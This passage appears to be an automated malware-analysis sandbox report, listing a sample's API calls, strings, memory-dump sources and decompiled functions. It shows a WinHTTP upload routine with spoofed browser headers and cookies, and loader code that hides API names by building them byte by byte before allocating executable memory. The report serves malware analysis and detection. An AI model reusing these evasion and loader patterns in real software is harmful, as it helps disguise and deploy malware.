                                                                                                                                                                  0x100223a9
                                                                                                                                                                  0x100223af
                                                                                                                                                                  0x100223b6
                                                                                                                                                                  0x100223dd
                                                                                                                                                                  0x100223e2
                                                                                                                                                                  0x100223f3
                                                                                                                                                                  0x100223fa
                                                                                                                                                                  0x100223fe
                                                                                                                                                                  0x10022404
                                                                                                                                                                  0x10022406
                                                                                                                                                                  0x1002240e
                                                                                                                                                                  0x1002240f
                                                                                                                                                                  0x10022414
                                                                                                                                                                  0x10022419
                                                                                                                                                                  0x10022419
                                                                                                                                                                  0x1002241c
                                                                                                                                                                  0x10022423
                                                                                                                                                                  0x10022439
                                                                                                                                                                  0x10022445
                                                                                                                                                                  0x1002244b
                                                                                                                                                                  0x1002245c
                                                                                                                                                                  0x10022461
                                                                                                                                                                  0x1002246e
                                                                                                                                                                  0x10022479
                                                                                                                                                                  0x1002247a
                                                                                                                                                                  0x1002247f
                                                                                                                                                                  0x10022482
                                                                                                                                                                  0x10022489
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022425
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022423
                                                                                                                                                                  0x100223b8
                                                                                                                                                                  0x100223bd
                                                                                                                                                                  0x100223c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100223c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022392
                                                                                                                                                                  0x10022376

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 100212F0: _memset.LIBCMT ref: 1002140B
                                                                                                                                                                    • Part of subcall function 100212F0: _strlen.LIBCMT ref: 1002144A
                                                                                                                                                                    • Part of subcall function 1001A3D0: _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                    • Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                    • Part of subcall function 1001A3D0: _memset.LIBCMT ref: 1001A426
                                                                                                                                                                    • Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021D1E
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021D33
                                                                                                                                                                  • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021DD7
                                                                                                                                                                  • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021DEF
                                                                                                                                                                  • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021E34
                                                                                                                                                                  • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021E89
                                                                                                                                                                  • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021EBF
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021EF4
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021F0A
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021F20
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021F36
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021F4C
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021F9A
                                                                                                                                                                  • _memset.LIBCMT ref: 10021FD5
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021FEE
                                                                                                                                                                  • _wcscat_s.LIBCMT ref: 10022009
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10022023
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10022068
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021636
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021653
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021670
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 10021692
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216AC
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216D8
                                                                                                                                                                    • Part of subcall function 100215A0: _strlen.LIBCMT ref: 100216EF
                                                                                                                                                                    • Part of subcall function 100215A0: _strlen.LIBCMT ref: 10021717
                                                                                                                                                                  • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 100220FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1002215E
                                                                                                                                                                  • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 10022202
                                                                                                                                                                  • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 1002221B
                                                                                                                                                                  • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002224B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10022251
                                                                                                                                                                  • _memset.LIBCMT ref: 1002228B
                                                                                                                                                                  • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 100222AB
                                                                                                                                                                  • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022366
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10022370
                                                                                                                                                                  • _printf.LIBCMT ref: 1002237C
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224B1
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224C1
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224D1
                                                                                                                                                                  Strings
                                                                                                                                                                  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021F01
                                                                                                                                                                  • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021F2D
                                                                                                                                                                  • GET, xrefs: 10021D13
                                                                                                                                                                  • upgrade-insecure-requests: 1, xrefs: 10021F43
                                                                                                                                                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 1002205F
                                                                                                                                                                  • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 1002240F
                                                                                                                                                                  • A WinHTTP Example Program/1.0, xrefs: 10021D5F
                                                                                                                                                                  • Out of memory., xrefs: 100223B8
                                                                                                                                                                  • Cookie: , xrefs: 10021FDD
                                                                                                                                                                  • Content-Type: multipart/form-data; boundary=%ws, xrefs: 100220A8
                                                                                                                                                                  • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022377
                                                                                                                                                                  • HTTP/1.1, xrefs: 10021E23
                                                                                                                                                                  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021F17
                                                                                                                                                                  • POST, xrefs: 10021D28
                                                                                                                                                                  • P, xrefs: 10021C6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E00427348() {
                                                                                                                                                                  				char _v6;
                                                                                                                                                                  				char _v7;
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v9;
                                                                                                                                                                  				char _v10;
                                                                                                                                                                  				char _v11;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v13;
                                                                                                                                                                  				char _v14;
                                                                                                                                                                  				char _v15;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v17;
                                                                                                                                                                  				char _v18;
                                                                                                                                                                  				char _v19;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _v21;
                                                                                                                                                                  				char _v22;
                                                                                                                                                                  				char _v23;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v29;
                                                                                                                                                                  				char _v30;
                                                                                                                                                                  				char _v31;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v33;
                                                                                                                                                                  				char _v34;
                                                                                                                                                                  				char _v35;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				intOrPtr _v62;
                                                                                                                                                                  				char _v317;
                                                                                                                                                                  				char _v318;
                                                                                                                                                                  				char _v319;
                                                                                                                                                                  				char _v320;
                                                                                                                                                                  				char _v321;
                                                                                                                                                                  				char _v322;
                                                                                                                                                                  				char _v323;
                                                                                                                                                                  				char _v324;
                                                                                                                                                                  				char _v325;
                                                                                                                                                                  				char _v326;
                                                                                                                                                                  				char _v327;
                                                                                                                                                                  				char _v328;
                                                                                                                                                                  				char _v345;
                                                                                                                                                                  				char _v346;
                                                                                                                                                                  				char _v347;
                                                                                                                                                                  				char _v348;
                                                                                                                                                                  				char _v349;
                                                                                                                                                                  				char _v350;
                                                                                                                                                                  				char _v351;
                                                                                                                                                                  				char _v352;
                                                                                                                                                                  				char _v353;
                                                                                                                                                                  				char _v354;
                                                                                                                                                                  				char _v355;
                                                                                                                                                                  				char _v356;
                                                                                                                                                                  				char _v357;
                                                                                                                                                                  				char _v358;
                                                                                                                                                                  				char _v359;
                                                                                                                                                                  				char _v360;
                                                                                                                                                                  				char _v361;
                                                                                                                                                                  				short _v363;
                                                                                                                                                                  				char _v367;
                                                                                                                                                                  				char _v371;
                                                                                                                                                                  				char _v375;
                                                                                                                                                                  				char _v379;
                                                                                                                                                                  				char _v380;
                                                                                                                                                                  				char _v416;
                                                                                                                                                                  				char _v436;
                                                                                                                                                                  				char _v442;
                                                                                                                                                                  				char _v443;
                                                                                                                                                                  				char _v446;
                                                                                                                                                                  				char _v447;
                                                                                                                                                                  				char _v448;
                                                                                                                                                                  				char _v449;
                                                                                                                                                                  				char _v450;
                                                                                                                                                                  				char _v454;
                                                                                                                                                                  				char _v455;
                                                                                                                                                                  				char _v456;
                                                                                                                                                                  				char _v461;
                                                                                                                                                                  				char _v462;
                                                                                                                                                                  				char _v463;
                                                                                                                                                                  				char _v464;
                                                                                                                                                                  				char _v465;
                                                                                                                                                                  				char _v466;
                                                                                                                                                                  				char _v467;
                                                                                                                                                                  				char _v468;
                                                                                                                                                                  				char _v469;
                                                                                                                                                                  				char _v470;
                                                                                                                                                                  				char _v471;
                                                                                                                                                                  				char _v472;
                                                                                                                                                                  				char _v484;
                                                                                                                                                                  				char _v485;
                                                                                                                                                                  				char _v486;
                                                                                                                                                                  				char _v487;
                                                                                                                                                                  				char _v488;
                                                                                                                                                                  				char _v489;
                                                                                                                                                                  				char _v490;
                                                                                                                                                                  				char _v491;
                                                                                                                                                                  				char _v492;
                                                                                                                                                                  				char _v493;
                                                                                                                                                                  				char _v494;
                                                                                                                                                                  				char _v495;
                                                                                                                                                                  				char _v496;
                                                                                                                                                                  				signed int _t127;
                                                                                                                                                                  				unsigned int _t128;
                                                                                                                                                                  				unsigned int _t129;
                                                                                                                                                                  				char* _t132;
                                                                                                                                                                  				intOrPtr* _t133;
                                                                                                                                                                  				void* _t134;
                                                                                                                                                                  				unsigned int _t140;
                                                                                                                                                                  
                                                                                                                                                                  				 *_t132 =  *_t133;
                                                                                                                                                                  				_t129 = _t128 >> 2;
                                                                                                                                                                  				 *((char*)(_t132 + 1)) =  *((intOrPtr*)(_t133 + 1));
                                                                                                                                                                  				_t134 = _t133 + 2;
                                                                                                                                                                  				asm("adc dword [ebp-0x75], 0xffffffec");
                                                                                                                                                                  				_v436 = 0;
                                                                                                                                                                  				_v416 = 0;
                                                                                                                                                                  				_v380 = 0;
                                                                                                                                                                  				_t127 = 0;
                                                                                                                                                                  				_v379 = 0;
                                                                                                                                                                  				_v375 = 0;
                                                                                                                                                                  				_v371 = 0;
                                                                                                                                                                  				_v367 = 0;
                                                                                                                                                                  				_v363 = 0;
                                                                                                                                                                  				_v361 = 0;
                                                                                                                                                                  				_v496 = 0x56;
                                                                                                                                                                  				_v495 = 0x69;
                                                                                                                                                                  				_v494 = 0x72;
                                                                                                                                                                  				_v493 = 0x74;
                                                                                                                                                                  				_v492 = 0x75;
                                                                                                                                                                  				_v491 = 0x61;
                                                                                                                                                                  				_v490 = 0x6c;
                                                                                                                                                                  				_v489 = 0x41;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t129 = _t129 + 1;
                                                                                                                                                                  					_t140 = _t129;
                                                                                                                                                                  					_v488 = 0x6c;
                                                                                                                                                                  					_v487 = 0x6c;
                                                                                                                                                                  					_v486 = 0x6f;
                                                                                                                                                                  					_v485 = 0x63;
                                                                                                                                                                  					_v484 = 0;
                                                                                                                                                                  					_v456 = 0x56;
                                                                                                                                                                  					_v455 = 0x69;
                                                                                                                                                                  					_v454 = 0x72;
                                                                                                                                                                  					while(_t140 >= 0) {
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						_push( *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)));
                                                                                                                                                                  						_t127 = _t127 + 1;
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						_push(_v62);
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						asm("popad");
                                                                                                                                                                  						_v450 = 0x6c;
                                                                                                                                                                  						_v449 = 0x50;
                                                                                                                                                                  						_v448 = 0x72;
                                                                                                                                                                  						_v447 = 0x6f;
                                                                                                                                                                  						_v446 = 0x74;
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						if(( *(_t134 - 2) & _t127) == 0) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						 *[gs:ebp-0x1b8] = 0x63;
                                                                                                                                                                  						_v443 = 0x74;
                                                                                                                                                                  						_v442 = 0;
                                                                                                                                                                  						_v24 = 0x47;
                                                                                                                                                                  						_v23 = 0x65;
                                                                                                                                                                  						_v22 = 0x74;
                                                                                                                                                                  						_v21 = 0x4d;
                                                                                                                                                                  						_v20 = 0x6f;
                                                                                                                                                                  						_v19 = 0x64;
                                                                                                                                                                  						_v18 = 0x75;
                                                                                                                                                                  						_v17 = 0x6c;
                                                                                                                                                                  						_v16 = 0x65;
                                                                                                                                                                  						_v15 = 0x46;
                                                                                                                                                                  						_v14 = 0x69;
                                                                                                                                                                  						_v13 = 0x6c;
                                                                                                                                                                  						_v12 = 0x65;
                                                                                                                                                                  						_v11 = 0x4e;
                                                                                                                                                                  						_v10 = 0x61;
                                                                                                                                                                  						_v9 = 0x6d;
                                                                                                                                                                  						_v8 = 0x65;
                                                                                                                                                                  						_v7 = 0x41;
                                                                                                                                                                  						_v6 = 0;
                                                                                                                                                                  						_v472 = 0x43;
                                                                                                                                                                  						_v471 = 0x72;
                                                                                                                                                                  						_v470 = 0x65;
                                                                                                                                                                  						_v469 = 0x61;
                                                                                                                                                                  						_v468 = 0x74;
                                                                                                                                                                  						_v467 = 0x65;
                                                                                                                                                                  						_v466 = 0x46;
                                                                                                                                                                  						_v465 = 0x69;
                                                                                                                                                                  						_v464 = 0x6c;
                                                                                                                                                                  						_v463 = 0x65;
                                                                                                                                                                  						_v462 = 0x41;
                                                                                                                                                                  						_v461 = 0;
                                                                                                                                                                  						_v360 = 0x47;
                                                                                                                                                                  						_v359 = 0x65;
                                                                                                                                                                  						_v358 = 0x74;
                                                                                                                                                                  						_v357 = 0x46;
                                                                                                                                                                  						_v356 = 0x69;
                                                                                                                                                                  						_v355 = 0x6c;
                                                                                                                                                                  						_v354 = 0x65;
                                                                                                                                                                  						_v353 = 0x53;
                                                                                                                                                                  						_v352 = 0x69;
                                                                                                                                                                  						_v351 = 0x7a;
                                                                                                                                                                  						_v350 = 0x65;
                                                                                                                                                                  						_v349 = 0;
                                                                                                                                                                  						_v36 = 0x52;
                                                                                                                                                                  						_v35 = 0x65;
                                                                                                                                                                  						_v34 = 0x61;
                                                                                                                                                                  						_v33 = 0x64;
                                                                                                                                                                  						_v32 = 0x46;
                                                                                                                                                                  						_v31 = 0x69;
                                                                                                                                                                  						_v30 = 0x6c;
                                                                                                                                                                  						_v29 = 0x65;
                                                                                                                                                                  						_v28 = 0;
                                                                                                                                                                  						_v328 = 0x43;
                                                                                                                                                                  						_v327 = 0x6c;
                                                                                                                                                                  						_v326 = 0x6f;
                                                                                                                                                                  						_v325 = 0x73;
                                                                                                                                                                  						_v324 = 0x65;
                                                                                                                                                                  						_v323 = 0x48;
                                                                                                                                                                  						_v322 = 0x61;
                                                                                                                                                                  						_v321 = 0x6e;
                                                                                                                                                                  						_v320 = 0x64;
                                                                                                                                                                  						_v319 = 0x6c;
                                                                                                                                                                  						_v318 = 0x65;
                                                                                                                                                                  						_v317 = 0;
                                                                                                                                                                  						_v348 = 0x47;
                                                                                                                                                                  						_v347 = 0x65;
                                                                                                                                                                  						_v346 = 0x74;
                                                                                                                                                                  						_v345 = 0x4c;
                                                                                                                                                                  						 *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)) =  *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)) - 1;
                                                                                                                                                                  						asm("lodsb");
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						goto ( *((intOrPtr*)(_t129 - 0x3a)));
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}


                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00427847
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0042787E
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004278B7
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004278D0
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0042790D
                                                                                                                                                                  • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004279A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                  • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                  • API String ID: 4217122820-3199432782
                                                                                                                                                                  • Opcode ID: 61382ec7c30945e40de5d5d355ef1e38b88686b682c74bce4878c4b6ed492f30
                                                                                                                                                                  • Instruction ID: 4738cdeff98adf356a40d86ea9c859c28883a0bba5c886e8c8a368019e3440a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 61382ec7c30945e40de5d5d355ef1e38b88686b682c74bce4878c4b6ed492f30
                                                                                                                                                                  • Instruction Fuzzy Hash: 7212CD70D082E8DAEB21CB64CC58BDEBFB56B16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E0042735B() {
                                                                                                                                                                  				char _v6;
                                                                                                                                                                  				char _v7;
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v9;
                                                                                                                                                                  				char _v10;
                                                                                                                                                                  				char _v11;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v13;
                                                                                                                                                                  				char _v14;
                                                                                                                                                                  				char _v15;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v17;
                                                                                                                                                                  				char _v18;
                                                                                                                                                                  				char _v19;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _v21;
                                                                                                                                                                  				char _v22;
                                                                                                                                                                  				char _v23;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v29;
                                                                                                                                                                  				char _v30;
                                                                                                                                                                  				char _v31;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v33;
                                                                                                                                                                  				char _v34;
                                                                                                                                                                  				char _v35;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				intOrPtr _v62;
                                                                                                                                                                  				char _v317;
                                                                                                                                                                  				char _v318;
                                                                                                                                                                  				char _v319;
                                                                                                                                                                  				char _v320;
                                                                                                                                                                  				char _v321;
                                                                                                                                                                  				char _v322;
                                                                                                                                                                  				char _v323;
                                                                                                                                                                  				char _v324;
                                                                                                                                                                  				char _v325;
                                                                                                                                                                  				char _v326;
                                                                                                                                                                  				char _v327;
                                                                                                                                                                  				char _v328;
                                                                                                                                                                  				char _v345;
                                                                                                                                                                  				char _v346;
                                                                                                                                                                  				char _v347;
                                                                                                                                                                  				char _v348;
                                                                                                                                                                  				char _v349;
                                                                                                                                                                  				char _v350;
                                                                                                                                                                  				char _v351;
                                                                                                                                                                  				char _v352;
                                                                                                                                                                  				char _v353;
                                                                                                                                                                  				char _v354;
                                                                                                                                                                  				char _v355;
                                                                                                                                                                  				char _v356;
                                                                                                                                                                  				char _v357;
                                                                                                                                                                  				char _v358;
                                                                                                                                                                  				char _v359;
                                                                                                                                                                  				char _v360;
                                                                                                                                                                  				char _v361;
                                                                                                                                                                  				short _v363;
                                                                                                                                                                  				char _v367;
                                                                                                                                                                  				char _v371;
                                                                                                                                                                  				char _v375;
                                                                                                                                                                  				char _v379;
                                                                                                                                                                  				char _v380;
                                                                                                                                                                  				char _v416;
                                                                                                                                                                  				char _v436;
                                                                                                                                                                  				char _v442;
                                                                                                                                                                  				char _v443;
                                                                                                                                                                  				char _v446;
                                                                                                                                                                  				char _v447;
                                                                                                                                                                  				char _v448;
                                                                                                                                                                  				char _v449;
                                                                                                                                                                  				char _v450;
                                                                                                                                                                  				char _v454;
                                                                                                                                                                  				char _v455;
                                                                                                                                                                  				char _v456;
                                                                                                                                                                  				char _v461;
                                                                                                                                                                  				char _v462;
                                                                                                                                                                  				char _v463;
                                                                                                                                                                  				char _v464;
                                                                                                                                                                  				char _v465;
                                                                                                                                                                  				char _v466;
                                                                                                                                                                  				char _v467;
                                                                                                                                                                  				char _v468;
                                                                                                                                                                  				char _v469;
                                                                                                                                                                  				char _v470;
                                                                                                                                                                  				char _v471;
                                                                                                                                                                  				char _v472;
                                                                                                                                                                  				char _v484;
                                                                                                                                                                  				char _v485;
                                                                                                                                                                  				char _v486;
                                                                                                                                                                  				char _v487;
                                                                                                                                                                  				char _v488;
                                                                                                                                                                  				char _v489;
                                                                                                                                                                  				char _v490;
                                                                                                                                                                  				char _v491;
                                                                                                                                                                  				char _v492;
                                                                                                                                                                  				char _v493;
                                                                                                                                                                  				char _v494;
                                                                                                                                                                  				char _v495;
                                                                                                                                                                  				char _v496;
                                                                                                                                                                  				signed int _t123;
                                                                                                                                                                  				void* _t124;
                                                                                                                                                                  				void* _t126;
                                                                                                                                                                  				void* _t128;
                                                                                                                                                                  
                                                                                                                                                                  				_v436 = 0;
                                                                                                                                                                  				_v416 = 0;
                                                                                                                                                                  				_v380 = 0;
                                                                                                                                                                  				_t123 = 0;
                                                                                                                                                                  				_v379 = 0;
                                                                                                                                                                  				_v375 = 0;
                                                                                                                                                                  				_v371 = 0;
                                                                                                                                                                  				_v367 = 0;
                                                                                                                                                                  				_v363 = 0;
                                                                                                                                                                  				_v361 = 0;
                                                                                                                                                                  				_v496 = 0x56;
                                                                                                                                                                  				_v495 = 0x69;
                                                                                                                                                                  				_v494 = 0x72;
                                                                                                                                                                  				_v493 = 0x74;
                                                                                                                                                                  				_v492 = 0x75;
                                                                                                                                                                  				_v491 = 0x61;
                                                                                                                                                                  				_v490 = 0x6c;
                                                                                                                                                                  				_v489 = 0x41;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t124 = _t124 + 1;
                                                                                                                                                                  					_t128 = _t124;
                                                                                                                                                                  					_v488 = 0x6c;
                                                                                                                                                                  					_v487 = 0x6c;
                                                                                                                                                                  					_v486 = 0x6f;
                                                                                                                                                                  					_v485 = 0x63;
                                                                                                                                                                  					_v484 = 0;
                                                                                                                                                                  					_v456 = 0x56;
                                                                                                                                                                  					_v455 = 0x69;
                                                                                                                                                                  					_v454 = 0x72;
                                                                                                                                                                  					while(_t128 >= 0) {
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						_push( *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)));
                                                                                                                                                                  						_t123 = _t123 + 1;
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						_push(_v62);
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						asm("popad");
                                                                                                                                                                  						_v450 = 0x6c;
                                                                                                                                                                  						_v449 = 0x50;
                                                                                                                                                                  						_v448 = 0x72;
                                                                                                                                                                  						_v447 = 0x6f;
                                                                                                                                                                  						_v446 = 0x74;
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						if(( *(_t126 - 2) & _t123) == 0) {
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						 *[gs:ebp-0x1b8] = 0x63;
                                                                                                                                                                  						_v443 = 0x74;
                                                                                                                                                                  						_v442 = 0;
                                                                                                                                                                  						_v24 = 0x47;
                                                                                                                                                                  						_v23 = 0x65;
                                                                                                                                                                  						_v22 = 0x74;
                                                                                                                                                                  						_v21 = 0x4d;
                                                                                                                                                                  						_v20 = 0x6f;
                                                                                                                                                                  						_v19 = 0x64;
                                                                                                                                                                  						_v18 = 0x75;
                                                                                                                                                                  						_v17 = 0x6c;
                                                                                                                                                                  						_v16 = 0x65;
                                                                                                                                                                  						_v15 = 0x46;
                                                                                                                                                                  						_v14 = 0x69;
                                                                                                                                                                  						_v13 = 0x6c;
                                                                                                                                                                  						_v12 = 0x65;
                                                                                                                                                                  						_v11 = 0x4e;
                                                                                                                                                                  						_v10 = 0x61;
                                                                                                                                                                  						_v9 = 0x6d;
                                                                                                                                                                  						_v8 = 0x65;
                                                                                                                                                                  						_v7 = 0x41;
                                                                                                                                                                  						_v6 = 0;
                                                                                                                                                                  						_v472 = 0x43;
                                                                                                                                                                  						_v471 = 0x72;
                                                                                                                                                                  						_v470 = 0x65;
                                                                                                                                                                  						_v469 = 0x61;
                                                                                                                                                                  						_v468 = 0x74;
                                                                                                                                                                  						_v467 = 0x65;
                                                                                                                                                                  						_v466 = 0x46;
                                                                                                                                                                  						_v465 = 0x69;
                                                                                                                                                                  						_v464 = 0x6c;
                                                                                                                                                                  						_v463 = 0x65;
                                                                                                                                                                  						_v462 = 0x41;
                                                                                                                                                                  						_v461 = 0;
                                                                                                                                                                  						_v360 = 0x47;
                                                                                                                                                                  						_v359 = 0x65;
                                                                                                                                                                  						_v358 = 0x74;
                                                                                                                                                                  						_v357 = 0x46;
                                                                                                                                                                  						_v356 = 0x69;
                                                                                                                                                                  						_v355 = 0x6c;
                                                                                                                                                                  						_v354 = 0x65;
                                                                                                                                                                  						_v353 = 0x53;
                                                                                                                                                                  						_v352 = 0x69;
                                                                                                                                                                  						_v351 = 0x7a;
                                                                                                                                                                  						_v350 = 0x65;
                                                                                                                                                                  						_v349 = 0;
                                                                                                                                                                  						_v36 = 0x52;
                                                                                                                                                                  						_v35 = 0x65;
                                                                                                                                                                  						_v34 = 0x61;
                                                                                                                                                                  						_v33 = 0x64;
                                                                                                                                                                  						_v32 = 0x46;
